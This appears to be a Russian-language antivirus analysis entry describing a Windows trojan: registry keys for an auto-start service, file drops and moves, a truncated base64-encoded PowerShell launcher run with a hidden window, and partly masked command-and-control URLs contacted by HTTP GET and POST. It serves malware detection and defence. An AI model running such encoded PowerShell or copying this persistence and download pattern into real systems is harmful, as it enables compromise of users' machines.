Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\defaultlocationcpl] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\defaultlocationcpl] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDPL1\defaultlocationcpl.exe"'
Создает следующие сервисы
- 'defaultlocationcpl' "%WINDIR%\SysWOW64\KBDPL1\defaultlocationcpl.exe"
- 'defaultlocationcpl' %WINDIR%\SysWOW64\KBDPL1\defaultlocationcpl.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQB0AC0AdgBBAHIASQBBAEIATABlACAAKAAiAGsANgAiACsAIgAxAHYATgAiACkAIAAgACgAWwBUAHkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIAIAAtAGYAIAAnAC4AaQBvAC4AJwAsACcARA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\ozl8bkc\begypjh\sayp9xhut.exe
Удаляет следующие файлы
- %HOMEPATH%\ozl8bkc\begypjh\sayp9xhut.exe
Перемещает следующие файлы
- %HOMEPATH%\ozl8bkc\begypjh\sayp9xhut.exe в %WINDIR%\syswow64\kbdpl1\defaultlocationcpl.exe
Подменяет следующие файлы
- %HOMEPATH%\ozl8bkc\begypjh\sayp9xhut.exe
Сетевая активность
Подключается к
- '20#.#9.6.174':80
TCP
Запросы HTTP GET
- http://pl###tjogja.com/wp-content/X/
- http://vn####elopers.com/wp-admin/BF/
- http://nu####weekparty.com/wp-includes/bQR/
Запросы HTTP POST
- http://20#.#9.6.174/lCIDJoKEYExjH/va2agnxciMl01cuzO/XBZUpDq0DOaf4X6/WjkJ1SBWluMhdGIyq/
UDP
- DNS ASK pl###tjogja.com
- DNS ASK vn####elopers.com
- DNS ASK nu####weekparty.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQB0AC0AdgBBAHIASQBBAEIATABlACAAKAAiAGsANgAiACsAIgAxAHYATgAiACkAIAAgACgAWwBUAHkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIAIAAtAGYAIAAnAC4AaQBvAC4AJwAsACcARA...' (со скрытым окном)
